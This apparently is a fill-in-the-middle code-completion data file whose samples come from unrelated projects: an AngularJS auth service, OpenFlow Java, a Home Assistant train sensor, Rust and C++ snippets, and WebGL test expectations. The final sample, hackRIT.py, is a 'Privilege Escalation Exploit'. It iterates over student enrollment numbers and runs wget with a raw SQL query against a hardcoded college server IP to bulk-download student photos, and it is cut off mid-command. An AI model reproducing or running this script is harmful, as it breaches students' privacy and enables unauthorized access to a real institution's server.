prompt: large_string (lengths 70 to 991k)
completion: large_string (lengths 0 to 1.02k)
<|file_name|>http.js<|end_file_name|><|fim▁begin|>(function () { 'use strict'; angular.module('metronome.services.http', ['angular-jwt']) .factory('http', ['$http', 'CONFIG', 'jwtHelper', function($http, CONFIG, jwtHelper) { var token = Cookies.get('token'); var now = moment(); var expirationdate = moment(jwtHelper.getTokenExpirationDate(token)).subtract(1, 'm'); if (now.isAfter(expirationdate)) { $http({ method: 'POST', url: CONFIG.api + "/auth", data: JSON.stringify({ type: "access", refreshToken: Cookies.get("refreshToken") }) }).then(function successCallback(response) { Cookies.set('token', response.data.token); }, function errorCallback(response) {<|fim▁hole|> token = Cookies.get('token'); return function(config) { return $http(angular.extend({ headers: { 'Authorization': token }, url: CONFIG.api + config.path }, config)); }; }]); })();<|fim▁end|>
console.log("Error on call to renew accessToken:", response); }); }
<|file_name|>OFOxmBsnInPorts128.java<|end_file_name|><|fim▁begin|>// Copyright (c) 2008 The Board of Trustees of The Leland Stanford Junior University // Copyright (c) 2011, 2012 Open Networking Foundation // Copyright (c) 2012, 2013 Big Switch Networks, Inc. // This library was generated by the LoxiGen Compiler. // See the file LICENSE.txt which should have been included in the source distribution // Automatically generated by LOXI from template of_interface.java // Do not modify package org.projectfloodlight.openflow.protocol.oxm; import org.projectfloodlight.openflow.protocol.*;<|fim▁hole|>import org.projectfloodlight.openflow.protocol.errormsg.*; import org.projectfloodlight.openflow.protocol.meterband.*; import org.projectfloodlight.openflow.protocol.instruction.*; import org.projectfloodlight.openflow.protocol.instructionid.*; import org.projectfloodlight.openflow.protocol.match.*; import org.projectfloodlight.openflow.protocol.stat.*; import org.projectfloodlight.openflow.protocol.oxm.*; import org.projectfloodlight.openflow.protocol.oxs.*; import org.projectfloodlight.openflow.protocol.queueprop.*; import org.projectfloodlight.openflow.types.*; import org.projectfloodlight.openflow.util.*; import org.projectfloodlight.openflow.exceptions.*; import io.netty.buffer.ByteBuf; public interface OFOxmBsnInPorts128 extends OFObject, OFOxm<OFBitMask128> { long getTypeLen(); OFBitMask128 getValue(); MatchField<OFBitMask128> getMatchField(); boolean isMasked(); OFOxm<OFBitMask128> getCanonical(); OFBitMask128 getMask(); OFVersion getVersion(); void writeTo(ByteBuf channelBuffer); Builder createBuilder(); public interface Builder extends OFOxm.Builder<OFBitMask128> { OFOxmBsnInPorts128 build(); long getTypeLen(); OFBitMask128 getValue(); Builder setValue(OFBitMask128 value); MatchField<OFBitMask128> getMatchField(); boolean isMasked(); OFOxm<OFBitMask128> getCanonical(); OFBitMask128 getMask(); OFVersion getVersion(); } }<|fim▁end|>
import org.projectfloodlight.openflow.protocol.action.*; import org.projectfloodlight.openflow.protocol.actionid.*; import org.projectfloodlight.openflow.protocol.bsntlv.*;
<|file_name|>sensor.py<|end_file_name|><|fim▁begin|>"""Support for the Italian train system using ViaggiaTreno API.""" import asyncio import logging import time import aiohttp import async_timeout<|fim▁hole|>import voluptuous as vol from homeassistant.components.sensor import PLATFORM_SCHEMA, SensorEntity from homeassistant.const import ATTR_ATTRIBUTION, HTTP_OK, TIME_MINUTES import homeassistant.helpers.config_validation as cv _LOGGER = logging.getLogger(__name__) ATTRIBUTION = "Powered by ViaggiaTreno Data" VIAGGIATRENO_ENDPOINT = ( "http://www.viaggiatreno.it/viaggiatrenonew/" "resteasy/viaggiatreno/andamentoTreno/" "{station_id}/{train_id}/{timestamp}" ) REQUEST_TIMEOUT = 5 # seconds ICON = "mdi:train" MONITORED_INFO = [ "categoria", "compOrarioArrivoZeroEffettivo", "compOrarioPartenzaZeroEffettivo", "destinazione", "numeroTreno", "orarioArrivo", "orarioPartenza", "origine", "subTitle", ] DEFAULT_NAME = "Train {}" CONF_NAME = "train_name" CONF_STATION_ID = "station_id" CONF_STATION_NAME = "station_name" CONF_TRAIN_ID = "train_id" ARRIVED_STRING = "Arrived" CANCELLED_STRING = "Cancelled" NOT_DEPARTED_STRING = "Not departed yet" NO_INFORMATION_STRING = "No information for this train now" PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend( { vol.Required(CONF_TRAIN_ID): cv.string, vol.Required(CONF_STATION_ID): cv.string, vol.Optional(CONF_NAME): cv.string, } ) async def async_setup_platform(hass, config, async_add_entities, discovery_info=None): """Set up the ViaggiaTreno platform.""" train_id = config.get(CONF_TRAIN_ID) station_id = config.get(CONF_STATION_ID) if not (name := config.get(CONF_NAME)): name = DEFAULT_NAME.format(train_id) async_add_entities([ViaggiaTrenoSensor(train_id, station_id, name)]) async def async_http_request(hass, uri): """Perform actual request.""" try: session = hass.helpers.aiohttp_client.async_get_clientsession(hass) with async_timeout.timeout(REQUEST_TIMEOUT): req = await session.get(uri) if req.status != HTTP_OK: return {"error": req.status} json_response = await req.json() return json_response except (asyncio.TimeoutError, aiohttp.ClientError) as exc: _LOGGER.error("Cannot connect to ViaggiaTreno API endpoint: %s", exc) except ValueError: _LOGGER.error("Received non-JSON data from ViaggiaTreno API endpoint") class ViaggiaTrenoSensor(SensorEntity): """Implementation of a ViaggiaTreno sensor.""" def __init__(self, train_id, station_id, name): """Initialize the sensor.""" self._state = None self._attributes = {} self._unit = "" self._icon = ICON self._station_id = station_id self._name = name self.uri = VIAGGIATRENO_ENDPOINT.format( station_id=station_id, train_id=train_id, timestamp=int(time.time()) * 1000 ) @property def name(self): """Return the name of the sensor.""" return self._name @property def native_value(self): """Return the state of the sensor.""" return self._state @property def icon(self): """Icon to use in the frontend, if any.""" return self._icon @property def native_unit_of_measurement(self): """Return the unit of measurement.""" return self._unit @property def extra_state_attributes(self): """Return extra attributes.""" self._attributes[ATTR_ATTRIBUTION] = ATTRIBUTION return self._attributes @staticmethod def has_departed(data): """Check if the train has actually departed.""" try: first_station = data["fermate"][0] if data["oraUltimoRilevamento"] or first_station["effettiva"]: return True except ValueError: _LOGGER.error("Cannot fetch first station: %s", data) return False @staticmethod def has_arrived(data): """Check if the train has already 
arrived.""" last_station = data["fermate"][-1] if not last_station["effettiva"]: return False return True @staticmethod def is_cancelled(data): """Check if the train is cancelled.""" if data["tipoTreno"] == "ST" and data["provvedimento"] == 1: return True return False async def async_update(self): """Update state.""" uri = self.uri res = await async_http_request(self.hass, uri) if res.get("error", ""): if res["error"] == 204: self._state = NO_INFORMATION_STRING self._unit = "" else: self._state = "Error: {}".format(res["error"]) self._unit = "" else: for i in MONITORED_INFO: self._attributes[i] = res[i] if self.is_cancelled(res): self._state = CANCELLED_STRING self._icon = "mdi:cancel" self._unit = "" elif not self.has_departed(res): self._state = NOT_DEPARTED_STRING self._unit = "" elif self.has_arrived(res): self._state = ARRIVED_STRING self._unit = "" else: self._state = res.get("ritardo") self._unit = TIME_MINUTES self._icon = ICON<|fim▁end|>
<|file_name|>14 circle function.py<|end_file_name|><|fim▁begin|>def circle(cx, cy, diameter): radius = diameter / 2<|fim▁hole|> # diameter = 254 # radius = diameter / 2 # cx, cy = (420, 532) # oval(cx - radius, cy - radius, diameter, diameter) circle(420, 532, 254) # diameter = 154 # radius = diameter / 2 # cx, cy = (728, 414) # oval(cx - radius, cy - radius, diameter, diameter) circle(728, 414, 154) circle(510, 258, 306)<|fim▁end|>
oval(cx - radius, cy - radius, diameter, diameter)
<|file_name|>connect.js<|end_file_name|><|fim▁begin|>const ircFramework = require('irc-framework') const store = require('../store') const attachEvents = require('./attachEvents') const connect = connection => { const state = store.getState() let ircClient = state.ircClients[connection.id] if (!ircClient) { ircClient = new ircFramework.Client({<|fim▁hole|> port: connection.port, tls: connection.tls, username: connection.username || connection.nick, password: connection.password, // "Not enough parameters" with empty gecos so a space is used. gecos: connection.gecos || ' ', // Custom auto reconnect mechanism is implemented, see events/connection.js. auto_reconnect: false, }) attachEvents(ircClient, connection.id) store.dispatch({ type: 'SET_IRC_CLIENT', payload: { connectionId: connection.id, ircClient, }, }) } ircClient.connect() } module.exports = connect<|fim▁end|>
nick: connection.nick, host: connection.host,
<|file_name|>separateOddsAndEvens.cpp<|end_file_name|><|fim▁begin|>#include <iostream> #include <vector> using namespace std; void separateOddsAndEvens(const vector<int>& arr, vector<int>& odds, vector<int>& evens); void printVector(const vector<int>& vec); int main() { vector<int> arrUnsplit = {1,2,3,4,5,6,7,8,9,10}; vector<int> odds, evens; cout << "main array is: " << endl; printVector(arrUnsplit); separateOddsAndEvens(arrUnsplit, odds, evens); cout << "odds is: " << endl; printVector(odds); cout << "evens is: " << endl; printVector(evens); return 0; } void separateOddsAndEvens(const vector<int>& arr, vector<int>& odds, vector<int>& evens) { int numodds = 0, numevens = 0; for(auto& i : arr) { if(i % 2 == 1) { numodds++; } else { numevens++; } } odds.reserve(numodds); evens.reserve(numevens); for(auto& i : arr) { if(i % 2 == 1) { odds.push_back(i); } else { evens.push_back(i); } } } void printVector(const vector<int>& vec) { cout << "["; for(auto& i : vec) { cout << i << ", "; } cout << "]" << endl;<|fim▁hole|><|fim▁end|>
}
<|file_name|>max_test.py<|end_file_name|><|fim▁begin|>from .max import max<|fim▁hole|> def max_test(): assert_equal(max([1, 3, 4, 2]), 4)<|fim▁end|>
from pyramda.private.asserts import assert_equal
<|file_name|>mod.rs<|end_file_name|><|fim▁begin|>// See LICENSE file for copyright and license details.<|fim▁hole|>pub mod dir; pub mod fs; pub mod game_state; pub mod map; pub mod misc; pub mod pathfinder; pub mod types; // vim: set tabstop=4 shiftwidth=4 softtabstop=4 expandtab:<|fim▁end|>
pub mod conf; pub mod core;
<|file_name|>volumetric_repr.rs<|end_file_name|><|fim▁begin|>use na::{Pnt2, Iso2, Pnt3, Mat3, Iso3, Mat1}; use ncollide::shape::{Ball, Cone, Cylinder, Convex3, Cuboid2, Cuboid3, Compound2, Compound3}; use ncollide::inspection::Repr; use ncollide::math::Scalar; use volumetric::Volumetric; macro_rules! dispatch( ($p: ty, $i: ty, $compound: ty, $convex: ty, $cuboid: ty, $sself: ident.$name: ident($($argN: ident),*)) => { { let repr = $sself.repr(); if let Some(b) = repr.downcast_ref::<Ball<N>>() { (b as &Volumetric<N, $p, $i>).$name($($argN,)*) }<|fim▁hole|> else if let Some(c) = repr.downcast_ref::<Cone<N>>() { (c as &Volumetric<N, $p, $i>).$name($($argN,)*) } else if let Some(c) = repr.downcast_ref::<$convex>() { c.$name($($argN,)*) } else if let Some(c) = repr.downcast_ref::<$cuboid>() { c.$name($($argN,)*) } else if let Some(c) = repr.downcast_ref::<Cylinder<N>>() { (c as &Volumetric<N, $p, $i>).$name($($argN,)*) } else { /* * XXX: dispatch by custom type. */ panic!("The `Volumetric` is not implemented by the given shape.") } } } ); impl<N> Volumetric<N, Pnt2<N>, Mat1<N>> for Repr<Pnt2<N>, Iso2<N>> where N: Scalar { fn surface(&self) -> N { dispatch!(Pnt2<N>, Mat1<N>, Compound2<N>, Cuboid2<N>/* Convex2<N> */, Cuboid2<N>, self.surface()) // XXX: ^^^^^^^^^^ // Change this when Volumetric is implemented for 2D convex. } fn volume(&self) -> N { dispatch!(Pnt2<N>, Mat1<N>, Compound2<N>, Cuboid2<N>/* Convex2<N> */, Cuboid2<N>, self.volume()) // XXX: ^^^^^^^^^^ // Change this when Volumetric is implemented for 2D convex. } fn center_of_mass(&self) -> Pnt2<N> { dispatch!(Pnt2<N>, Mat1<N>, Compound2<N>, Cuboid2<N>/* Convex2<N> */, Cuboid2<N>, self.center_of_mass()) // XXX: ^^^^^^^^^^ // Change this when Volumetric is implemented for 2D convex. } fn unit_angular_inertia(&self) -> Mat1<N> { dispatch!(Pnt2<N>, Mat1<N>, Compound2<N>, Cuboid2<N>/* Convex2<N> */, Cuboid2<N>, self.unit_angular_inertia()) // XXX: ^^^^^^^^^^ // Change this when Volumetric is implemented for 2D convex. } fn mass_properties(&self, density: N) -> (N, Pnt2<N>, Mat1<N>) { dispatch!(Pnt2<N>, Mat1<N>, Compound2<N>, Cuboid2<N>/* Convex2<N> */, Cuboid2<N>, self.mass_properties(density)) // XXX: ^^^^^^^^^^ // Change this when Volumetric is implemented for 2D convex. } } impl<N> Volumetric<N, Pnt3<N>, Mat3<N>> for Repr<Pnt3<N>, Iso3<N>> where N: Scalar { fn surface(&self) -> N { dispatch!(Pnt3<N>, Mat3<N>, Compound3<N>, Convex3<N>, Cuboid3<N>, self.surface()) } fn volume(&self) -> N { dispatch!(Pnt3<N>, Mat3<N>, Compound3<N>, Convex3<N>, Cuboid3<N>, self.volume()) } fn center_of_mass(&self) -> Pnt3<N> { dispatch!(Pnt3<N>, Mat3<N>, Compound3<N>, Convex3<N>, Cuboid3<N>, self.center_of_mass()) } fn unit_angular_inertia(&self) -> Mat3<N> { dispatch!(Pnt3<N>, Mat3<N>, Compound3<N>, Convex3<N>, Cuboid3<N>, self.unit_angular_inertia()) } fn mass_properties(&self, density: N) -> (N, Pnt3<N>, Mat3<N>) { dispatch!(Pnt3<N>, Mat3<N>, Compound3<N>, Convex3<N>, Cuboid3<N>, self.mass_properties(density)) } }<|fim▁end|>
else if let Some(c) = repr.downcast_ref::<$compound>() { c.$name($($argN,)*) }
<|file_name|>__init__.py<|end_file_name|><|fim▁begin|># # Copyright (C) 2014 Mathias Weber <[email protected]> # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # 1. Redistributions of source code must retain the above copyright notice, # this list of conditions and the following disclaimer. # 2. Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution.<|fim▁hole|># THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF # THE POSSIBILITY OF SUCH DAMAGE. # from user import * from event import *<|fim▁end|>
#
<|file_name|>cstore.rs<|end_file_name|><|fim▁begin|>// Copyright 2012 The Rust Project Developers. See the COPYRIGHT // file at the top-level directory of this distribution and at // http://rust-lang.org/COPYRIGHT. // // Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or // http://www.apache.org/licenses/LICENSE-2.0> or the MIT license // <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your // option. This file may not be copied, modified, or distributed // except according to those terms. // The crate store - a central repo for information collected about external // crates and libraries use metadata::cstore; use metadata::decoder; use std::hashmap::HashMap; use extra; use syntax::ast; use syntax::parse::token::ident_interner; // A map from external crate numbers (as decoded from some crate file) to // local crate numbers (as generated during this session). Each external // crate may refer to types in other external crates, and each has their // own crate numbers. pub type cnum_map = @mut HashMap<ast::crate_num, ast::crate_num>; pub struct crate_metadata { name: @str, data: @~[u8], cnum_map: cnum_map, cnum: ast::crate_num } pub struct CStore { priv metas: HashMap <ast::crate_num, @crate_metadata>, priv extern_mod_crate_map: extern_mod_crate_map, priv used_crate_files: ~[Path], priv used_libraries: ~[@str], priv used_link_args: ~[@str], intr: @ident_interner } // Map from node_id's of local extern mod statements to crate numbers type extern_mod_crate_map = HashMap<ast::node_id, ast::crate_num>; pub fn mk_cstore(intr: @ident_interner) -> CStore { return CStore { metas: HashMap::new(), extern_mod_crate_map: HashMap::new(), used_crate_files: ~[], used_libraries: ~[], used_link_args: ~[], intr: intr }; } pub fn get_crate_data(cstore: &CStore, cnum: ast::crate_num) -> @crate_metadata { return *cstore.metas.get(&cnum); } pub fn get_crate_hash(cstore: &CStore, cnum: ast::crate_num) -> @str { let cdata = get_crate_data(cstore, cnum); decoder::get_crate_hash(cdata.data) } pub fn get_crate_vers(cstore: &CStore, cnum: ast::crate_num) -> @str { let cdata = get_crate_data(cstore, cnum); decoder::get_crate_vers(cdata.data) } pub fn set_crate_data(cstore: &mut CStore, cnum: ast::crate_num, data: @crate_metadata) { cstore.metas.insert(cnum, data); } pub fn have_crate_data(cstore: &CStore, cnum: ast::crate_num) -> bool { cstore.metas.contains_key(&cnum) } pub fn iter_crate_data(cstore: &CStore, i: &fn(ast::crate_num, @crate_metadata)) { for cstore.metas.iter().advance |(&k, &v)| { i(k, v); } } pub fn add_used_crate_file(cstore: &mut CStore, lib: &Path) { if !cstore.used_crate_files.contains(lib) { cstore.used_crate_files.push(copy *lib); } }<|fim▁hole|>} pub fn add_used_library(cstore: &mut CStore, lib: @str) -> bool { assert!(!lib.is_empty()); if cstore.used_libraries.iter().any_(|x| x == &lib) { return false; } cstore.used_libraries.push(lib); true } pub fn get_used_libraries<'a>(cstore: &'a CStore) -> &'a [@str] { let slice: &'a [@str] = cstore.used_libraries; slice } pub fn add_used_link_args(cstore: &mut CStore, args: &str) { for args.split_iter(' ').advance |s| { cstore.used_link_args.push(s.to_managed()); } } pub fn get_used_link_args<'a>(cstore: &'a CStore) -> &'a [@str] { let slice: &'a [@str] = cstore.used_link_args; slice } pub fn add_extern_mod_stmt_cnum(cstore: &mut CStore, emod_id: ast::node_id, cnum: ast::crate_num) { cstore.extern_mod_crate_map.insert(emod_id, cnum); } pub fn find_extern_mod_stmt_cnum(cstore: &CStore, emod_id: ast::node_id) -> Option<ast::crate_num> { 
cstore.extern_mod_crate_map.find(&emod_id).map_consume(|x| *x) } // returns hashes of crates directly used by this crate. Hashes are sorted by // (crate name, crate version, crate hash) in lexicographic order (not semver) pub fn get_dep_hashes(cstore: &CStore) -> ~[@str] { struct crate_hash { name: @str, vers: @str, hash: @str } let mut result = ~[]; for cstore.extern_mod_crate_map.each_value |&cnum| { let cdata = cstore::get_crate_data(cstore, cnum); let hash = decoder::get_crate_hash(cdata.data); let vers = decoder::get_crate_vers(cdata.data); debug!("Add hash[%s]: %s %s", cdata.name, vers, hash); result.push(crate_hash { name: cdata.name, vers: vers, hash: hash }); } let sorted = do extra::sort::merge_sort(result) |a, b| { (a.name, a.vers, a.hash) <= (b.name, b.vers, b.hash) }; debug!("sorted:"); for sorted.iter().advance |x| { debug!(" hash[%s]: %s", x.name, x.hash); } sorted.map(|ch| ch.hash) }<|fim▁end|>
pub fn get_used_crate_files(cstore: &CStore) -> ~[Path] { return /*bad*/copy cstore.used_crate_files;
<|file_name|>export-non-interference3.rs<|end_file_name|><|fim▁begin|>// xfail-fast<|fim▁hole|>// file at the top-level directory of this distribution and at // http://rust-lang.org/COPYRIGHT. // // Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or // http://www.apache.org/licenses/LICENSE-2.0> or the MIT license // <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your // option. This file may not be copied, modified, or distributed // except according to those terms. pub mod foo { pub fn x() { ::bar::x(); } } pub mod bar { pub fn x() { debug!("x"); } } pub fn main() { foo::x(); }<|fim▁end|>
// Copyright 2012 The Rust Project Developers. See the COPYRIGHT
<|file_name|>webgl_conformance_expectations.py<|end_file_name|><|fim▁begin|># Copyright (c) 2013 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. from telemetry.page import test_expectations # Valid expectation conditions are: # # Operating systems: # win, xp, vista, win7, mac, leopard, snowleopard, lion, mountainlion, # linux, chromeos, android # # GPU vendors: # amd, arm, broadcom, hisilicon, intel, imagination, nvidia, qualcomm, # vivante # # Specific GPUs can be listed as a tuple with vendor name and device ID. # Examples: ('nvidia', 0x1234), ('arm', 'Mali-T604') # Device IDs must be paired with a GPU vendor. class WebGLConformanceExpectations(test_expectations.TestExpectations): def SetExpectations(self): # Sample Usage: # self.Fail('gl-enable-vertex-attrib.html', # ['mac', 'amd', ('nvidia', 0x1234)], bug=123) # Fails everywhere. self.Skip('conformance/glsl/misc/large-loop-compile.html', bug=322764) self.Skip('conformance/textures/texture-size-limit.html', bug=322789) # Windows failures. self.Fail('conformance/ogles/GL/atan/atan_001_to_008.html', ['win'], bug=322794) self.Fail('conformance/ogles/GL/atan/atan_009_to_012.html', ['win'], bug=322794) self.Skip('conformance/ogles/GL/control_flow/control_flow_001_to_008.html', ['win'], bug=322795) # Windows/Intel failures self.Fail('conformance/textures/texture-size.html', ['win', 'intel'], bug=121139) self.Fail('conformance/rendering/gl-scissor-test.html', ['win', 'intel'], bug=314997) # Windows/AMD failures self.Fail('conformance/rendering/more-than-65536-indices.html', ['win', 'amd'], bug=314997) # Windows 7/Intel failures self.Fail('conformance/context/context-lost-restored.html', ['win7', 'intel']) self.Fail('conformance/context/premultiplyalpha-test.html', ['win7', 'intel']) self.Fail('conformance/extensions/oes-texture-float-with-image-data.html', ['win7', 'intel']) self.Fail('conformance/extensions/oes-texture-float.html', ['win7', 'intel']) self.Fail('conformance/limits/gl-min-attribs.html', ['win7', 'intel']) self.Fail('conformance/limits/gl-max-texture-dimensions.html', ['win7', 'intel']) self.Fail('conformance/limits/gl-min-textures.html', ['win7', 'intel']) self.Fail('conformance/limits/gl-min-uniforms.html', ['win7', 'intel']) self.Fail('conformance/rendering/gl-clear.html', ['win7', 'intel']) self.Fail('conformance/textures/copy-tex-image-and-sub-image-2d.html', ['win7', 'intel']) self.Fail('conformance/textures/gl-teximage.html', ['win7', 'intel']) self.Fail('conformance/textures/tex-image-and-sub-image-2d-with-array-buffer-view.html', ['win7', 'intel']) self.Fail('conformance/textures/tex-image-and-sub-image-2d-with-image-data.html', ['win7', 'intel']) self.Fail('conformance/textures/tex-image-and-sub-image-2d-with-image-data-rgb565.html', ['win7', 'intel']) self.Fail('conformance/textures/tex-image-and-sub-image-2d-with-image-data-rgba4444.html', ['win7', 'intel']) self.Fail('conformance/textures/tex-image-and-sub-image-2d-with-image-data-rgba5551.html', ['win7', 'intel']) self.Fail('conformance/textures/tex-image-with-format-and-type.html', ['win7', 'intel']) self.Fail('conformance/textures/tex-sub-image-2d.html', ['win7', 'intel']) self.Fail('conformance/textures/texparameter-test.html', ['win7', 'intel']) self.Fail('conformance/textures/texture-active-bind-2.html', ['win7', 'intel']) self.Fail('conformance/textures/texture-active-bind.html', ['win7', 'intel']) self.Fail('conformance/textures/texture-complete.html', ['win7', 
'intel']) self.Fail('conformance/textures/texture-formats-test.html', ['win7', 'intel']) self.Fail('conformance/textures/texture-mips.html', ['win7', 'intel']) self.Fail('conformance/textures/texture-npot.html', ['win7', 'intel']) self.Fail('conformance/textures/texture-size-cube-maps.html', ['win7', 'intel']) self.Fail('conformance/context/context-attribute-preserve-drawing-buffer.html', ['win7', 'intel'], bug=322770) # Mac failures. self.Fail('conformance/glsl/misc/shaders-with-varyings.html', ['mac'], bug=322760) self.Fail('conformance/context/context-attribute-preserve-drawing-buffer.html', ['mac'], bug=322770) self.Skip('conformance/ogles/GL/control_flow/control_flow_001_to_008.html', ['mac'], bug=322795) # Mac/Intel failures self.Fail('conformance/rendering/gl-scissor-test.html', ['mac', 'intel'], bug=314997) # The following two tests hang the WindowServer. self.Skip('conformance/canvas/drawingbuffer-static-canvas-test.html', ['mac', 'intel'], bug=303915) self.Skip('conformance/canvas/drawingbuffer-test.html', ['mac', 'intel'], bug=303915) # The following three tests only fail. # Radar 13499677 self.Fail( 'conformance/glsl/functions/glsl-function-smoothstep-gentype.html', ['mac', 'intel'], bug=225642) # Radar 13499466 self.Fail('conformance/limits/gl-max-texture-dimensions.html', ['mac', 'intel'], bug=225642) # Radar 13499623 self.Fail('conformance/textures/texture-size.html', ['mac', 'intel'], bug=225642) self.Skip('conformance/ogles/GL/control_flow/control_flow_009_to_010.html', ['mac', 'intel'], bug=322795) self.Fail('conformance/ogles/GL/operators/operators_009_to_016.html',<|fim▁hole|> ['mac', 'intel'], bug=322795) # Mac/Intel failures on 10.7 self.Skip('conformance/glsl/functions/glsl-function-asin.html', ['lion', 'intel']) self.Skip('conformance/glsl/functions/glsl-function-dot.html', ['lion', 'intel']) self.Skip('conformance/glsl/functions/glsl-function-faceforward.html', ['lion', 'intel']) self.Skip('conformance/glsl/functions/glsl-function-length.html', ['lion', 'intel']) self.Skip('conformance/glsl/functions/glsl-function-normalize.html', ['lion', 'intel']) self.Skip('conformance/glsl/functions/glsl-function-reflect.html', ['lion', 'intel']) self.Skip( 'conformance/glsl/functions/glsl-function-smoothstep-gentype.html', ['lion', 'intel']) self.Skip('conformance/limits/gl-max-texture-dimensions.html', ['lion', 'intel']) self.Skip('conformance/rendering/line-loop-tri-fan.html', ['lion', 'intel']) self.Skip('conformance/ogles/GL/control_flow/control_flow_009_to_010.html', ['lion'], bug=322795) self.Skip('conformance/ogles/GL/dot/dot_001_to_006.html', ['lion', 'intel'], bug=323736) self.Skip('conformance/ogles/GL/faceforward/faceforward_001_to_006.html', ['lion', 'intel'], bug=323736) self.Skip('conformance/ogles/GL/length/length_001_to_006.html', ['lion', 'intel'], bug=323736) self.Skip('conformance/ogles/GL/normalize/normalize_001_to_006.html', ['lion', 'intel'], bug=323736) self.Skip('conformance/ogles/GL/reflect/reflect_001_to_006.html', ['lion', 'intel'], bug=323736) self.Skip('conformance/ogles/GL/refract/refract_001_to_006.html', ['lion', 'intel'], bug=323736) self.Skip('conformance/ogles/GL/tan/tan_001_to_006.html', ['lion', 'intel'], bug=323736) # Mac/ATI failures self.Skip('conformance/extensions/oes-texture-float-with-image-data.html', ['mac', 'amd'], bug=308328) self.Skip('conformance/rendering/gl-clear.html', ['mac', 'amd'], bug=308328) self.Skip('conformance/textures/tex-image-and-sub-image-2d-with-array-buffer-view.html', ['mac', 'amd'], bug=308328) 
self.Skip('conformance/textures/tex-image-and-sub-image-2d-with-image-data.html', ['mac', 'amd'], bug=308328) self.Skip('conformance/textures/tex-image-and-sub-image-2d-with-image-data-rgb565.html', ['mac', 'amd'], bug=308328) self.Skip('conformance/textures/tex-image-and-sub-image-2d-with-image-data-rgba4444.html', ['mac', 'amd'], bug=308328) self.Skip('conformance/textures/tex-image-and-sub-image-2d-with-image-data-rgba5551.html', ['mac', 'amd'], bug=308328) self.Fail('conformance/canvas/drawingbuffer-test.html', ['mac', 'amd'], bug=314997) # Linux/NVIDIA failures self.Fail('conformance/glsl/misc/empty_main.vert.html', ['linux', ('nvidia', 0x1040)], bug=325884) self.Fail('conformance/glsl/misc/gl_position_unset.vert.html', ['linux', ('nvidia', 0x1040)], bug=325884) self.Fail('conformance/uniforms/uniform-location.html', ['linux', ('nvidia', 0x1040)], bug=325884) # Android failures self.Fail('conformance/textures/texture-npot-video.html', ['android'], bug=306485) # The following test is very slow and therefore times out on Android bot. self.Skip('conformance/rendering/multisample-corruption.html', ['android']) self.Fail('conformance/canvas/drawingbuffer-test.html', ['android'], bug=314997) self.Fail('conformance/glsl/misc/empty_main.vert.html', ['android'], bug=315976) self.Fail('conformance/glsl/misc/gl_position_unset.vert.html', ['android'], bug=315976) # Skip slow tests. self.Skip('conformance/context/context-creation-and-destruction.html', bug=322689) self.Skip('conformance/rendering/multisample-corruption.html', bug=322689)<|fim▁end|>
<|file_name|>hackRIT.py<|end_file_name|><|fim▁begin|>import os #Decoration Starts print """ +=============================================================+ || Privilege Escalation Exploit || || +===================================================+ || || | _ _ _ ____ _ __ ____ ___ _____ | || || | | | | | / \ / ___| |/ / | _ \|_ _|_ _| | || || | | |_| | / _ \| | | ' / | |_) || | | | | || || | | _ |/ ___ \ |___| . \ | _ < | | | | | || || | |_| |_/_/ \_\____|_|\_\ |_| \_\___| |_| | || || | | || || +===================================================+ || || ~ by Yadnyawalkya Tale ([email protected]) ~ || +=============================================================+ """ #Decoration Ends # Class according to Year Input <|fim▁hole|>if year_input == 1: year_choice = 1300000 #Final Year elif year_input == 2: year_choice = 1400000 #Third Year elif year_input == 3: year_choice = 1500000 #Second Year elif year_input == 4: year_choice = 1600000 #First Year # Department Class Input print "\n1.Automobile\n2.Civil\n3.ComputerScience\n4.InformationTechnology\n5.ETC\n6.Electrial\n7.Mech" class_input = input() if class_input == 1: class_choice = 1000 #Automobile Department elif class_input == 2: class_choice = 2000 #Civil Department elif class_input == 3: class_choice = 3000 #ComputerScience Department elif class_input == 4: class_choice = 4000 #InformationTechnology Department elif class_input == 5: class_choice = 5000 #ETC Department elif class_input == 6: class_choice = 8000 #Electrial Department elif class_input == 7: class_choice = 6000 #Mechanical Department startflag = year_choice + class_choice #For eg. Start @ 1303000 if class_input == 7: endflag = year_choice + class_choice + 70 +128 #Special Arrangement for Mechanical ;) else: endflag = year_choice + class_choice + 70 #For eg. End @ 1303070 os.system("mkdir ritphotos") decoration="=" while startflag < endflag: startflag = startflag + 1 cmd1 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(startflag,startflag) os.system(cmd1) decoration = "=" + decoration print "{0}".format(decoration) print "100%\tPlease Wait..." pstartflag = year_choice + class_choice + 150000 if class_input == 7: pendflag = year_choice + class_choice + 40 + 150000 #For All branches else: pendflag = year_choice + class_choice + 15 + 150000 #Special Arrangement for Mechanical ;) while pstartflag < pendflag: pstartflag = pstartflag + 1 cmd2 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 